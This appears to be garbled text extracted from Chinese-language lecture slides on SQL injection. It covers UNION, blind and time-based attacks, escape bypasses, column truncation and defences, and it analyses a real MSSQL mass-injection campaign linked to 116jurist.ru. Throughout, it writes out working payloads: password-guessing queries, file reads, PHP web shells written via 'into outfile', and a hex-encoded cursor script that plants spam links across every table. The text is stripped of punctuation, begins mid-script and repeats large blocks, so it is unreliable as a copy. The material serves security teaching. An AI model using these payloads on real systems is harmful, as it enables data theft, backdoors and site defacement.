in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
